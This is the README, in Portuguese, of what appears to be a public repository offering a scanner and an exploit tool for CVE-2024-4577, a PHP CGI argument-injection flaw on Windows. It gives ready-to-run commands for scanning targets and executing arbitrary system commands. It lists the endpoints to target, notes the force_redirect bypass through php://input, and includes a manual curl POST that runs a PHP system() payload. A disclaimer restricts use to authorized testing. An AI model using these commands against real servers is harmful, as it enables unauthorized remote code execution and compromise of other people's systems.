
Scanner e ferramenta de exploração para CVE-2024-4577, uma vulnerabilidade de injeção de argumentos em PHP CGI que permite execução remota de código em sistemas Windows. Inclui módulos de detecção e execução de comandos.
CVE-2024-4577 é uma vulnerabilidade crítica de injeção de argumentos no PHP CGI que afeta sistemas Windows que executam PHP em modo CGI. Essa falha permite que atacantes remotos injetem argumentos na linha de comando do PHP por meio de URLs especialmente elaboradas, levando à execução remota de código (RCE).
Este repositório inclui:
CVE-2024-4577.py: Um scanner para detectar alvos vulneráveis.exploit.py: Uma ferramenta de exploit que envia código PHP e executa comandos de sistema no servidor vulnerável.⚠️ AVISO
Este projeto é apenas para fins educacionais e testes autorizados. Qualquer uso indevido deste código não é de responsabilidade do autor. Use com responsabilidade e apenas em ambientes que você possua ou tenha permissão explícita para testar.
requestsInstale as dependências:
pip install -r requirements.txt
Detecte se um alvo é vulnerável ao CVE-2024-4577:
python3 CVE-2024-4577.py -u http://target.com

python3 CVE-2024-4577.py -f urls.txt

python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php
O scanner e o exploit testam endpoints CGI comuns, como:
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello
O payload contorna o cgi.force_redirect e antepõe PHP malicioso usando php://input.
Execute comandos arbitrários do sistema em um alvo vulnerável:
python3 exploit.py -u http://target.com -c "id"

python3 exploit.py -f urls.txt -c "id"

Você também pode explorar a vulnerabilidade manualmente usando o curl
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"
Isso envia um payload PHP que executa uname -a no servidor e retorna a saída.

Este código é distribuído sob a Licença MIT. Consulte LICENSE para mais informações.